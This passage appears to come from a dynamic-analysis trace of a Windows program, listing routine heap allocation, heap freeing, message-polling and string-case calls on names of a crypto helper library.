wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0137.287] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0137.287] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0137.287] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0137.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0137.287] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0137.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0137.288] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0137.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0137.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0137.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0137.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0137.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0137.291] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0137.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0137.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0137.292] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0137.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0137.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0137.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0137.292] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0137.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0137.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0137.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0137.293] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0137.293] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0137.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0137.294] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0137.294] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0137.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0137.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0137.295] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0137.296] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0137.296] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0137.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.297] HeapFree (in: 